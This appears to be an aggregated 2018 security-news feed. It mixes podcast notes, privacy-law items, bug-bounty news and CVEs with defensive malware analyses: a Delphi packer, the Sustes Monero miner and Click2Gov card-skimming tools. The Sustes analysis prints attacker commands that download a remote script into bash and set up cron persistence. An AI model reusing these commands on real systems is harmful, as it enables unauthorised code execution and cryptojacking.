This week, Paul interviews Mike Ahmadi, Global Director of IoT Security Solutions at DigiCert! Apollo Clark delivers the Technical Segment on Threat Hunting in the Cloud! In the Security News this week, Senate can't protect senators staff from Cyber Attacks, Equifax fined by ICO over data breach that hit Britons, US judge allows e-voting despite hack fears, Zero Day in Internet connected cameras, US Military given the power to hack back and defend forward, and AmazonBasics Microwave works with Alexa!


Presentation Link:



Full Show Notes:

Visit for all the latest episodes!


→Visit https://www.activecountermeasures/psw to sign up for a demo or buy our AI Hunter!!

→Follow us on Twitter:

→Like us on Facebook:

New Federal Credit Freeze Law Eliminates Fees, Provides for Year-Long Fraud Alerts

Effective September 21, 2018, Section 301 of the Economic Growth, Regulatory Relief, and Consumer Protection Act (the “Act”) requires consumer reporting agencies to provide free credit freezes and year-long fraud alerts to consumers throughout the country. Under the Act, consumer reporting agencies must each set up a webpage designed to enable consumers to request credit freezes, fraud alerts, extended fraud alerts and active duty fraud alerts. The webpage must also give consumers the ability to opt out of the use of information in a consumer report to send the consumer a solicitation of credit or insurance. Consumers may find links to these webpages on the Federal Trade Commission’s Identity Theft website.

The Act also enables parents and guardians to freeze their children’s credit if they are under age 16. Guardians or conservators of incapacitated persons may also request credit freezes on their behalf.

Section 302 of the Act provides additional protections for active duty military. Under this section, consumer reporting agencies must offer free electronic credit monitoring to all active duty military.

For more information, read the FTC’s blog post.

IDG Contributor Network: Open banking is coming to the U.S.: How secure will it be?

The open banking trend continues around the world, and most recently, the U.S. has taken another step towards adopting the policy. On July 31, the U.S. Department of Treasury published a detailed, titled A Financial System That Creates Economic Opportunities: Nonbank Financials, Fintech, and Innovation that will likely serve as the catalyst for open banking in the United States.   

The Department of Treasury places the U.S. on a growing list of nations that are modernizing their financial systems, including the UK, the European Union, South Korea, Singapore, Australia, Canada, and Japan. Traditional banks are modernizing through open banking and digital transformation to acquire and retain customers and remain competitive.

To read this article in full, please click here

Apple to Require Privacy Policies for All New Apps and App Updates

On August 30, 2018, Apple Inc. announced a June update to its App Store Review Guidelines that will require each developer to provide its privacy policy as part of the app review process, and to include in such policy specific content requirements. Effective October 3, 2018, all new apps and app updates must include a link to the developer’s privacy policy before they can be submitted for distribution to users through the App Store or through TestFlight external testing.

The privacy policy must detail what data the app gathers, how the data will be collected and how such data will be used. The policy also must confirm that third parties with whom an app shares user data will provide the same or equal protection of user data as stated in the app’s privacy policy and the App Store Review Guidelines. Lastly, the policy must explain the developer’s data retention policy, as well as include information on how users can revoke consent to data collection or request deletion of the collected user data. Developers only will be able to edit an app’s privacy policy when submitting a new version of the app.

Android and Google Play Security Rewards Programs surpass $3M in payouts

Posted by Jason Woloz and Mayank Jain, Android Security & Privacy Team

[Cross-posted from the Android Developers Blog]

Our Android and Play security reward programs help us work with top researchers from around the world to improve Android ecosystem security every day. Thank you to all the amazing researchers who submitted vulnerability reports.

Android Security Rewards

In the ASR program's third year, we received over 470 qualifying vulnerability reports from researchers and the average pay per researcher jumped by 23%. To date, the ASR program has rewarded researchers with over $3M, paying out roughly $1M per year.
Here are some of the highlights from the Android Security Rewards program's third year:
  • There were no payouts for our highest possible reward: a complete remote exploit chain leading to TrustZone or Verified Boot compromise.
  • 99 individuals contributed one or more fixes.
  • The ASR program's reward averages were $2,600 per reward and $12,500 per researcher.
  • Guang Gong received our highest reward amount to date: $105,000 for his submission of a remote exploit chain.
As part of our ongoing commitment to security we regularly update our programs and policies based on ecosystem feedback. We also updated our severity guidelines for evaluating the impact of reported security vulnerabilities against the Android platform.

Google Play Security Rewards

In October 2017, we rolled out the Google Play Security Reward Program to encourage security research into popular Android apps available on Google Play. So far, researchers have reported over 30 vulnerabilities through the program, earning a combined bounty amount of over $100K.
If undetected, these vulnerabilities could have potentially led to elevation of privilege, access to sensitive data and remote code execution on devices.

Keeping devices secure

In addition to rewarding for vulnerabilities, we continue to work with the broad and diverse Android ecosystem to protect users from issues reported through our program. We collaborate with manufacturers to ensure that these issues are fixed on their devices through monthly security updates. Over 250 device models have a majority of their deployed devices running a security update from the last 90 days. This table shows the models with a majority of deployed devices running a security update from the last three months:

AsusZenFone 5Z (ZS620KL/ZS621KL), ZenFone Max Plus M1 (ZB570TL), ZenFone 4 Pro (ZS551KL), ZenFone 5 (ZE620KL), ZenFone Max M1 (ZB555KL), ZenFone 4 (ZE554KL), ZenFone 4 Selfie Pro (ZD552KL), ZenFone 3 (ZE552KL), ZenFone 3 Zoom (ZE553KL), ZenFone 3 (ZE520KL), ZenFone 3 Deluxe (ZS570KL), ZenFone 4 Selfie (ZD553KL), ZenFone Live L1 (ZA550KL), ZenFone 5 Lite (ZC600KL), ZenFone 3s Max (ZC521TL)
BlackBerryBlackBerry MOTION, BlackBerry KEY2
BluGrand XL LTE, Vivo ONE, R2_3G, Grand_M2, BLU STUDIO J8 LTE
bqAquaris V Plus, Aquaris V, Aquaris U2 Lite, Aquaris U2, Aquaris X, Aquaris X2, Aquaris X Pro, Aquaris U Plus, Aquaris X5 Plus, Aquaris U lite, Aquaris U
DocomoF-04K, F-05J, F-03H
Essential ProductsPH-1
General MobileGM8, GM8 Go
GooglePixel 2 XL, Pixel 2, Pixel XL, Pixel
HTCU12+, HTC U11+
HuaweiHonor Note10, nova 3, nova 3i, Huawei Nova 3I, 荣耀9i, 华为G9青春版, Honor Play, G9青春版, P20 Pro, Honor V9, huawei nova 2, P20 lite, Honor 10, Honor 8 Pro, Honor 6X, Honor 9, nova 3e, P20, PORSCHE DESIGN HUAWEI Mate RS, FRD-L02, HUAWEI Y9 2018, Huawei Nova 2, Honor View 10, HUAWEI P20 Lite, Mate 9 Pro, Nexus 6P, HUAWEI Y5 2018, Honor V10, Mate 10 Pro, Mate 9, Honor 9, Lite, 荣耀9青春版, nova 2i, HUAWEI nova 2 Plus, P10 lite, nova 青春版本, FIG-LX1, HUAWEI G Elite Plus, HUAWEI Y7 2018, Honor 7S, HUAWEI P smart, P10, Honor 7C, 荣耀8青春版, HUAWEI Y7 Prime 2018, P10 Plus, 荣耀畅玩7X, HUAWEI Y6 2018, Mate 10 lite, Honor 7A, P9 Plus, 华为畅享8, honor 6x, HUAWEI P9 lite mini, HUAWEI GR5 2017, Mate 10
LanixAlpha_950, Ilium X520
LavaZ61, Z50
LGELG Q7+, LG G7 ThinQ, LG Stylo 4, LG K30, V30+, LG V35 ThinQ, Stylo 2 V, LG K20 V, ZONE4, LG Q7, DM-01K, Nexus 5X, LG K9, LG K11
MotorolaMoto Z Play Droid, moto g(6) plus, Moto Z Droid, Moto X (4), Moto G Plus (5th Gen), Moto Z (2) Force, Moto G (5S) Plus, Moto G (5) Plus, moto g(6) play, Moto G (5S), moto e5 play, moto e(5) play, moto e(5) cruise, Moto E4, Moto Z Play, Moto G (5th Gen)
NokiaNokia 8, Nokia 7 plus, Nokia 6.1, Nokia 8 Sirocco, Nokia X6, Nokia 3.1
OnePlusOnePlus 6, OnePlus5T, OnePlus3T, OnePlus5, OnePlus3
OppoCPH1803, CPH1821, CPH1837, CPH1835, CPH1819, CPH1719, CPH1613, CPH1609, CPH1715, CPH1861, CPH1831, CPH1801, CPH1859, A83, R9s Plus
PositivoTwist, Twist Mini
SamsungGalaxy A8 Star, Galaxy J7 Star, Galaxy Jean, Galaxy On6, Galaxy Note9, Galaxy J3 V, Galaxy A9 Star, Galaxy J7 V, Galaxy S8 Active, Galaxy Wide3, Galaxy J3 Eclipse, Galaxy S9+, Galaxy S9, Galaxy A9 Star Lite, Galaxy J7 Refine, Galaxy J7 Max, Galaxy Wide2, Galaxy J7(2017), Galaxy S8+, Galaxy S8, Galaxy A3(2017), Galaxy Note8, Galaxy A8+(2018), Galaxy J3 Top, Galaxy J3 Emerge, Galaxy On Nxt, Galaxy J3 Achieve, Galaxy A5(2017), Galaxy J2(2016), Galaxy J7 Pop, Galaxy A6, Galaxy J7 Pro, Galaxy A6 Plus, Galaxy Grand Prime Pro, Galaxy J2 (2018), Galaxy S6 Active, Galaxy A8(2018), Galaxy J3 Pop, Galaxy J3 Mission, Galaxy S6 edge+, Galaxy Note Fan Edition, Galaxy J7 Prime, Galaxy A5(2016)
Sharpシンプルスマホ4, AQUOS sense plus (SH-M07), AQUOS R2 SH-03K, X4, AQUOS R SH-03J, AQUOS R2 SHV42, X1, AQUOS sense lite (SH-M05)
SonyXperia XZ2 Premium, Xperia XZ2 Compact, Xperia XA2, Xperia XA2 Ultra, Xperia XZ1 Compact, Xperia XZ2, Xperia XZ Premium, Xperia XZ1, Xperia L2, Xperia X
TecnoF1, CAMON I Ace
VestelVestel Z20
Vivovivo 1805, vivo 1803, V9 6GB, Y71, vivo 1802, vivo Y85A, vivo 1726, vivo 1723, V9, vivo 1808, vivo 1727, vivo 1724, vivo X9s Plus, Y55s, vivo 1725, Y66, vivo 1714, 1609, 1601
VodafoneVodafone Smart N9
XiaomiMi A2, Mi A2 Lite, MI 8, MI 8 SE, MIX 2S, Redmi 6Pro, Redmi Note 5 Pro, Redmi Note 5, Mi A1, Redmi S2, MI MAX 2, MI 6X

Thank you to everyone internally and externally who helped make Android safer and stronger in the past year. Together, we made a huge investment in security research that helps Android users everywhere. If you want to get involved to make next year even better, check out our detailed program rules. For tips on how to submit complete reports, see Bug Hunter University.

Increased Use of a Delphi Packer to Evade Malware Classification


The concept of "packing" or "crypting" a malicious program is widely popular among threat actors looking to bypass or defeat analysis by static and dynamic analysis tools. Evasion of classification and detection is an arms race in which new techniques are traded and used in the wild. For example, we observe many crypting services being offered in underground forums by actors who claim to make any malware "FUD" or "Fully Undetectable" by anti-virus technologies, sandboxes and other endpoint solutions. We also see an increased effort to model normal user activity and baseline it as an effective countermeasure to fingerprint malware analysis environments.

Delphi Code to the Rescue

The samples we inspected were carrying the Delphi signature (Figure 1) and were consistent with Delphi code constructs on analyzing with IDR (Interactive Delphi Reconstructor).

Figure 1: Delphi signature in sample

The Delphi programming language can be an easy way to write applications and programs that leverage Windows API functions. In fact, some actors deliberately include the default libraries as a diversion to hamper static analysis and make the application "look legit" during dynamic analysis. Figure 2 shows the forum post of an actor discussing this technique.

Figure 2: Underground forum post of an actor discussing technique

Distribution Campaigns

We have observed many spam campaigns with different themes that drop payloads packed using this packer.

An example is an average swift transfer spam that carries a document file as an attachment (hash: 71cd5df89e3936bb39790010d6d52a2d), which leverages malicious macros to drop the payload. The spam email is shown in Figure 3.

Figure 3: Spam example 1

Another example is an average quotation themed spam that carries an exploit document file as an attachment (hash: 0543e266012d9a3e33a9688a95fce358), which leverages an equation editor vulnerability to drop the payload (Figure 4).

Figure 4: Spam example 2

The documents in the examples fetched a payload from This turned out to be Lokibot malware.

User Activity Checks

The packer goes to great lengths to ensure that it is not running in an analysis environment. Normal user activity involves many application windows being rotated or changed over a period of time. The first variant of the packer uses GetForegroundWindow API to check for the user activity of changing windows at least three times before it executes further. If it does not see the change of windows, it puts itself into an infinite sleep. The code is shown in Figure 5. Interestingly, some of the publicly available sandboxes can be detected by this simple technique.

Figure 5: Window change check

To confirm user activity, a second variant of the packer checks for mouse cursor movement using GetCursorPos and Sleep APIs, while a third variant checks for system idle state using GetLastInputInfo and GetTickCount APIs.

Extracting Real Payloads from the PE Resources

The original payload is split into multiple binary blobs and stored in various locations inside the resource directory, as shown in Figure 6.

Figure 6: Bitmap resource with encrypted contents

To locate and assemble the real payload bytes, the packer code first directly reads content from a hardcoded resource ID inside the resource section. The first 16 bytes of this form a XOR key used to decrypt rest of the bytes using rolling XOR. The decrypted bytes actually represent an internal data structure, as shown in Figure 7, used by the packer to reference encrypted and obfuscated buffers at various resource IDs.

Figure 7: Structure showing encrypted file information

The packer then reads values from the encrypted buffers, starting from dwStartResourceId to dwStartResourceId+dwNumberOfResources, and brings them to a single location by reading chunks of dwChunkSize. Once the final data buffer is prepared, it starts decrypting it using the same rolling XOR algorithm mentioned previously and the new key from the aforementioned structure, producing the core payload executable. This script can be used to extract the real payload statically.

Classification of Real Families

Many of the unpacked binaries that we were able to extract from the sample set were identified as belonging to the Lokibot malware family. We were also able to identify Pony, IRStealer, Nanocore, Netwire, Remcos, and nJRAT malware families, as well as a coin mining malware family, among others. A distribution of the malware families using the packer is shown in Figure 8. This diversity of malware families implies that many threat actors are using this "crypting" service/tool for their operations, possibly buying it from the developer itself.

Figure 8: Distribution of malware families using packer


Packers and crypter services provide threat actors an easy and convenient option to outsource the workload of keeping their real payloads undetected and unclassified as long as possible. They are regularly finding nifty ways to bypass sandbox environments with anti-analysis techniques; hence, detonating malware samples in a sandbox environment that try to model real user behavior is a safe bet.

FireEye MVX Engine both detects and blocks this activity.

Indicators of Compromise (IOCs)

  • 853bed3ad5cc4b1471e959bfd0ea7c7c
  • e3c421d404c08809dd8ee3365552e305
  • 14e5326c5da90cd6619b7fe1bc4a97e1
  • dc999a1a2c5e796e450c0a6a61950e3f
  • 3ad781934e67a8b84739866b0b55544b
  • b4f5e691b264103b9c4fb04fa3429f1e

Tick That Box – Enterprise Security Weekly #107

This week, Doug White and Matt Alderman talk about Big Time IT Audit Mistakes in the Enterprise! In the Enterprise News this week, Cisco aims to make security foundational throughout Its business, Fidelis looks to grow cyber-security platform, how artificial intelligence can improve human decision-making in IoT apps, Crossmatch announces the availability of DigitalPersona v3.0, and Video Fingerprinting. All that and more on this episode of Enterprise Security Weekly!


Full Show Notes:


Visit for all the latest episodes!


Visit https://www.activecountermeasures/esw to sign up for a demo or buy our AI Hunter!


→Visit our website:

→Follow us on Twitter:

→Like us on Facebook:

Sustes Malware: CPU for Monero

Today I'd like to share a simple analysis based on fascinating threat that I like to call Sustes (you will see name genesis in a bit).

Everybody knows Monero crypto currency and probably everybody knows that it has built upon privacy, by meaning It's not that simple to figure out Monero wallet balance. Sustes ( is a nice example of Pirate-Mining and even if it's hard to figure out its magnitude, since the attacker built-up private pool-proxies, I believe it's interesting to fix wallet address in memories and to share IoC for future Protection. So, let's have a closer look to it.

Monero stops you trying to check wallet balance
Sustes Malware doesn't infect victims by itself (it's not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget (http:\/\/192[.]99[.]142[.]226[:]8220\/ ) directly on the victim machine followed by a simple /bin/bash The script is a simple bash script which drops and executes additional software with a bit of spicy. The following code represents the content as a today (ref. blog post date).

An initial connection-check wants to take down unwanted software on the victim side (awk '{print $7}' | sed -e "s/\/.*//g") taking decisions upon specific IP addresses. It filters PID from connection states and it directly kills them (kill -9). The extracted attacker's unwanted communications are the following ones:
  • 103[.]99[.]115[.]220  (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
  • 104[.]160[.]171[.]94 (Org:  Sharktech  Country: USA)
  • 121[.]18[.]238[.]56 (Org:  ChinaUnicom,  Country: CN)
  • 170[.]178[.]178[.]57 (Org:  Sharktech  Country: USA)
  • 27[.]155[.]87[.]59 (Org:  CHINANET-FJ  Country: CN)
  • 52[.]15[.]62[.]13 (Org:   Amazon Technologies Inc.,  Country: USA)
  • 52[.]15[.]72[.]79 (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
  • 91[.]236[.]182[.]1 (Org:  Brillant Auto Kft,  Country: HU)
A second check comes from "command lines arguments". Sustes "greps" to search for configuration files (for example: wc.conf and wq.conf and wm.conf) then it looks for software names such as sustes (here we go !) and kills everything matches the "grep". The script follows by assigning to f2 variable the dropping website (192[.]99[.]142[.]226:8220) and later-on it calls "f2" adding specific paths (for example: /xm64 and wt.conf) in order to drop crafted components. follows by running the dropped software with configuration file as follows:

nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &

MR.SH ends up by setting a periodic crontab action on dropping and executing itself by setting up:

crontab -l 2>/dev/null; echo "* * * * * $LDR | bash -sh > /dev/null 2>&1"

Following the analysis and extracting the configuration file from dropping URL we might observe the Monero wallet addresses and the Monero Pools used by attacker. The following wallets (W1, W2, W3) were found.

  • W1: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
  • W2: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
  • W3: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
Quick analyses on the used Monero pools took me to believe the attacker built up a custom  and private (deployed on private infrastructures) monero pool/proxies, for such a reason I believe it would be nice to monitor and/or block the following addresses:
  • 158[.]69[.]133[.]20 on port 3333
  • 192[.]99[.]142[.]249 on port 3333
  • 202[.]144[.]193[.]110 on port 3333 
The downloaded payload is named sustes and it is a basic XMRIG, which is a well-known opensource miner. In this scenario it is used to make money at the expense of computer users by abusing the infected computer to mine Monero, a cryptocurrency. The following image shows the usage strings as an initial proof of software.

XMRIG prove 1

Many people are currently wondering what is the sustes process which is draining a lot of PC resources (for example: here, here and here ) .... now we have an answer: it's a unwanted Miner. :D.

Hope you had fun

  • IP Address:
    • 103[.]99[.]115[.]220  (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
    • 104[.]160[.]171[.]94 (Org:  Sharktech  Country: USA)
    • 121[.]18[.]238[.]56 (Org:  ChinaUnicom,  Country: CN)
    • 170[.]178[.]178[.]57 (Org:  Sharktech  Country: USA)
    • 27[.]155[.]87[.]59 (Org:  CHINANET-FJ  Country: CN)
    • 52[.]15[.]62[.]13 (Org:   Amazon Technologies Inc.,  Country: USA)
    • 52[.]15[.]72[.]79 (Org:  HOST EDU (OPC) PRIVATE LIMITED,  Country: IN)
    • 91[.]236[.]182[.]1 (Org:  Brillant Auto Kft,  Country: HU)
  • Custom Monero Pools:
    • 158[.]69[.]133[.]20:3333
    • 192[.]99[.]142[.]249:3333
    • 202[.]144[.]193[.]110:3333 
  • Wallets:
    • W1: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
    • W2: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
    • W3: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg

CVE-2018-17231 (telegram_desktop)

** DISPUTED ** Telegram Desktop (aka tdesktop) 1.3.14 might allow attackers to cause a denial of service (assertion failure and application exit) via an "Edit color palette" search that triggers an "index out of range" condition. NOTE: this issue is disputed by multiple third parties because the described attack scenario does not cross a privilege boundary.

Canadian Regulator Seeks Public Comment on Breach Reporting Guidance

As reported in BNA Privacy Law Watch, the Office of the Privacy Commissioner of Canada (the “OPC”) is seeking public comment on recently released guidance (the “Guidance”) intended to assist organizations with understanding their obligations under the federal breach notification mandate, which will take effect in Canada on November 1, 2018. 

Breach notification in Canada has historically been governed at the provincial level, with only Alberta requiring omnibus breach notification. As we previously reported, effective November 1, organizations subject to the federal Personal Information Protection and Electronic Documents Act (“PIPEDA”) will be required to notify affected individuals and the OPC of security breaches involving personal information “that pose a real risk of significant harm to individuals.” The Guidance, which is structured in a question-and-answer format, is intended to assist companies with complying with the new reporting obligation. The Guidance describes, among other information, (1) who is responsible for reporting a breach, (2) what types of incidents must be reported, (3) how to determine whether there is a “real risk of significant harm,” (4) what information must be included in a notification to the OPC and affected individuals, and (5) an organization’s recordkeeping requirements with respect to breaches of personal information, irrespective of whether such breaches are notifiable. The Guidance also contains a proposed breach reporting form for notifying the OPC pursuant to the new notification obligation.

The OPC is accepting public comment on the Guidance, including on the proposed breach reporting form. The deadline for interested parties to submit comments is October 2, 2018.

CVE-2018-17205 (openstack, openvswitch, virtualization)

An issue was discovered in Open vSwitch (OvS) 2.7.x through 2.7.6, affecting ofproto_rule_insert__ in ofproto/ofproto.c. During bundle commit, flows that are added in a bundle are applied to ofproto in order. If a flow cannot be added (e.g., the flow action is a go-to for a group id that does not exist), OvS tries to revert back all previous flows that were successfully applied from the same bundle. This is possible since OvS maintains list of old flows that were replaced by flows from the bundle. While reinserting old flows, OvS has an assertion failure due to a check on rule state != RULE_INITIALIZED. This would work for new flows, but for an old flow the rule state is RULE_REMOVED. The assertion failure causes an OvS crash.

CVE-2018-17204 (openstack, openvswitch, virtualization)

An issue was discovered in Open vSwitch (OvS) 2.7.x through 2.7.6, affecting parse_group_prop_ntr_selection_method in lib/ofp-util.c. When decoding a group mod, it validates the group type and command after the whole group mod has been decoded. The OF1.5 decoder, however, tries to use the type and command earlier, when it might still be invalid. This causes an assertion failure (via OVS_NOT_REACHED). ovs-vswitchd does not enable support for OpenFlow 1.5 by default.

Click It Up: Targeting Local Government Payment Portals

FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. Click2Gov is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses. In October 2017, Superion released a statement confirming suspicious activity had affected a small number of customers. In mid-June 2018, numerous media reports referenced at least seven Click2Gov customers that were possibly affected by this campaign. Since June 2018, additional victims have been identified in public reporting. A review of public statements by these organizations appear to confirm compromises associated with Click2Gov.

On June 15, 2018, Superion released a statement describing their proactive notification to affected customers, work with a third-party forensic firm (not Mandiant), and deployment of patches to Click2Gov software and a related third-party component. Superion then concluded that there was no evidence that it is unsafe to make payments utilizing Click2Gov on hosted or secure on-premise networks with recommended patches and configurations.

Mandiant forensically analyzed compromised systems and recovered malware associated with this campaign, which provided insight into the capabilities of this new attacker. As of this publication, the discussed malware families have very low detection rates by antivirus solutions, as reported by VirusTotal.

Attack Overview

The first stage of the campaign typically started with the attacker uploading a SJavaWebManage webshell to facilitate interaction with the compromised Click2Gov webserver. Through interaction with the webshell, the attacker enabled debug mode in a Click2Gov configuration file causing the application to write payment card information to plaintext log files. The attacker then uploaded a tool, which FireEye refers to as FIREALARM, to the webserver to parse these log files, retrieve the payment card information, and remove all log entries not containing error messages. Additionally, the attacker used another tool, SPOTLIGHT, to intercept payment card information from HTTP network traffic. The remainder of this blog post dives into the details of the attacker's tactics, techniques, and procedures (TTPs).

SJavaWebManage Webshell

It is not known how the attacker compromised the Click2Gov webservers, but they likely employed an exploit targeting Oracle Web Logic such as CVE-2017-3248, CVE-2017-3506, or CVE-2017-10271, which would provide the capability to upload arbitrary files or achieve remote access. After exploiting the vulnerability, the attacker uploaded a variant of the publicly available JavaServer Pages (JSP) webshell SJavaWebManage to maintain persistence on the webserver. SJavaWebManage requires authentication to access four specific pages, as depicted in Figure 1, and will execute commands in the context of the Tomcat service, by default the Local System account.

Figure 1: Sample SJavaWebManage interface

  • EnvsInfo: Displays information about the Java runtime, Tomcat version, and other information about the environment.
  • FileManager: Provides the ability to browse, upload, download (original or compressed), edit, delete, and timestomp files.
  • CMDS: Executes a command using cmd.exe (or /bin/sh if on a non-Windows system) and returns the response.
  • DBManage: Interacts with a database by connecting, displaying database metadata, and executing SQL commands.

The differences between the publicly available webshell and this variant include variable names that were changed to possibly inhibit detection, Chinese characters that were changed to English, references to SjavaWebManage that were deleted, and code to handle updates to the webshell being removed. Additionally, the variant identified during the campaign investigation included the ability to manipulate file timestamps on the server. This functionality is not present in the public version. The SJavaWebManage webshell provided the attacker a sufficient interface to easily interact with and manipulate the compromised hosts.

The attacker would then restart a module in DEBUG mode using the SJavaWebManage CMDS page after editing a Click2Gov XML configuration file. With the DEBUG logging option enabled, the Click2Gov module would log plaintext payment card data to the Click2Gov log files with naming convention Click2GovCX.logYYYY-MM-DD.


Using interactive commands within the webshell, the attacker uploaded and executed a datamining utility FireEye tracks as FIREALARM, which parses through Click2Gov log files to retrieve payment card data, format the data, and print it to the console.

FIREALARM is a command line tool written in C/C++ that accepts three numbers as arguments; Year, Month, and Day, represented in a sample command line as: evil.exe 2018 09 01. From this example, FIREALARM would attempt to open and parse logs starting on 2018-09-01 until the present day. If the log files exists, FIREALARM copies the MAC (Modified, Accessed, Created) times to later timestomp the corresponding file back to original times. Each log file is then read line by line and parsed. FIREALARM searches each line for the following contents and parses the data:

  • medium.accountNumber
  • medium.cvv2
  • medium.expirationDate.year
  • medium.expirationDate.month
  • medium.firstName
  • medium.lastName
  • medium.middleInitial

This data is formatted and printed to the console. The malware also searches for lines that contain the text ERROR -. If this string is found, the utility stores the contents in a temporary file named %WINDIR%\temp\THN1080.tmp. After searching every line in the Click2GovCX log file, the temporary file THN1080.tmp is copied to replace the respective Click2GovCX log file and the timestamps are replaced to the original, copied timestamps. The result is that FIREALARM prints payment card information to the console and removes the payment card data from each Click2GovCX log file, leaving only the error messages. Finally, the THN1080.tmp temporary file is deleted. This process is depicted in Figure 2.

Figure 2: FIREALARM workflow

  1. Attacker traverses Tor or other proxy and authenticates to SjavaWebManage.
  2. Attacker launches cmd prompt via webshell.
  3. Attacker runs FIREALARM with parameters.
  4. FIREALARM verifies and iterates through log files, copies MAC times, parses and prints payment card data to the console, copies error messages to THN1080.tmp, overwrites the original log file and timestomps with orginal times.
  5. THN1080.tmp is deleted.


Later, during attacker access to the compromised system, the attacker used the webshell to upload a network sniffer FireEye tracks as SPOTLIGHT. This tool offered the attacker better persistence to the host and continuous collection of payment card data, ensuring the mined data would not be lost if Click2GovCX log files were deleted by an administrator. SPOTLIGHT is also written in C/C++ and may be installed by command line arguments or run as a service.  When run as a service, its tasks include ensuring that two JSP files exist, and monitoring and logging network traffic for specific HTTP POST request contents.

SPOTLIGHT accepts two command line arguments:

  • gplcsvc.exe -i  Creates a new service named gplcsvc with the display name Group Policy Service
  • gplcsvc.exe -u  Stops and deletes the service named gplcsvc

Upon installation, SPOTLIGHT will monitor two paths on the infected host every hour:

  1. C:\bea\c2gdomain\applications\Click2GovCX\scripts\validator.jsp
  2. C:\bea\c2gdomain\applications\ePortalLocalService\axis2-web\RightFrame.jsp

If either file does not exist, the malware Base64 decodes an embedded SJavaWebManage webshell and writes the same file to either path. This is the same webshell installed by the attacker during the initial compromise.

Additionally, SPOTLIGHT starts a socket listener to inspect IPv4 TCP traffic on port 80 and 7101. According to a Superion installation checklist, TCP port 7101 is used for application resolution from the internal network to the Click2Gov webserver. As long as the connection contents do not begin with GET /, the malware begins saving a buffer of received packets. The malware continues saving packet contents to an internal buffer until one of two conditions occurs – the buffer exceeds the size 102399 or the packet contents begin with the string POST /OnePoint/services/OnePointService. If either of these two conditions occur, the internal buffer data is searched for the following tags:

  • <op:AccountNum>
  • <op:CSC>
  • <op:ExpDate>
  • <op:FirstName>
  • <op:LastName>
  • <op:MInitial>
  • <op:Street1>
  • <op:Street2>
  • <op:City>
  • <op:State>
  • <op:PostalCode>

The contents between the tags are extracted and formatted with a `|`, which is used as a separator character. The formatted data is then Base64 encoded and appended to a log file at the hard-coded file path: c:\windows\temp\opt.log. The attacker then used SJavaWebManage to exfiltrate the Base64 encoded log file containing payment card data. FireEye has not identified any manipulation of a compromised host’s SSL configuration settings or redirection of SSL traffic to an unencrypted port. This process is depicted in Figure 3.

Figure 3: SPOTLIGHT workflow

  1. SPOTLIGHT verifies webshell file on an hourly basis, writing SJavaWebManage if missing.
  2. SPOTLIGHT inspects IPv4 TCP traffic on port 80 or 7101, saving a buffer of received packets.
  3. A user accesses Click2Gov module to make a payment.
  4. SPOTLIGHT parses packets for payment card data, Base64 encodes and writes to opt.log.
  5. Attacker traverses Tor or other proxy and authenticates to SJavaWebManage and launches File Manager.
  6. Attacker exfiltrates opt.log file.


Based on the available campaign information, the attacker doesn’t align with any financially motivated threat groups currently tracked by FireEye. The attacker’s understanding of the Click2Gov host requirements, process logging details, payment card fields, and internal communications protocols demonstrates an advanced knowledge of the Click2Gov application.  Given the manner in which underground forums and marketplaces function, it is possible that tool development could have been contracted to third parties and remote access to compromised systems could have been achieved by one entity and sold to another. There is much left to be uncovered about this attacker.  

While it is also possible the attack was conducted by a single individual, FireEye assesses, with moderate confidence, that a team was likely involved in this campaign based on the following requisite skillsets:

  • Ability to locate Click2Gov installations and identify exploitable vulnerabilities.
  • Ability to craft or reuse an exploit to penetrate the target organization’s network environment.
  • Basic JSP programming skills.
  • Advanced knowledge of Click2Gov payment processes and software sufficient to develop moderately sophisticated malware.
  • Proficient C/C++ programming skills.
  • General awareness of operational security.
  • Ability to monetize stolen payment card information.


In addition to a regimented patch management program, FireEye recommends that organizations consider implementing a file integrity monitoring solution to monitor the static content and code that generates dynamic content on e-commerce webservers for unexpected modifications.  Another best practice is to ensure any web service accounts run at least privilege.

Although the TTPs observed in the attack lifecycle are generally consistent with other financially motivated attack groups tracked by FireEye, this attacker demonstrated ingenuity in crafting malware exploiting Click2Gov installations, achieving moderate success. Although it may transpire in a new form, FireEye anticipates this threat actor will continue to conduct interactive and financially motivated attacks.


FireEye’s Adversary Pursuit Team from Technical Operations & Reverse Engineering – Advanced Practices works jointly with Mandiant Consulting and FireEye Labs Advanced Reverse Engineering (FLARE) during investigations assessed as directly supporting a nation-state or financial gains intrusions targeting organizations and involving interactive and focused efforts. The synergy of this relationship allows FireEye to rapidly identify new activity associated with currently tracked threat groups, as well as new threat actors, advanced malware, or TTPs leveraged by threat groups, and quickly mitigate them across the FireEye enterprise.

FireEye detects the malware documented in this blog post as the following:

  • FE_Tool_Win32_FIREALARM_1
  • FE_Trojan_Win64_SPOTLIGHT_1
  • FE_Webshell_JSP_SJavaWebManage_1
  • Webshell.JSP.SJavaWebManage

Indicators of Compromise (MD5)


  • 91eaca79943c972cb2ca7ee0e462922c          
  • 80f8a487314a9573ab7f9cb232ab1642         
  • cc155b8cd261a6ed33f264e710ce300e           (Publicly available version)


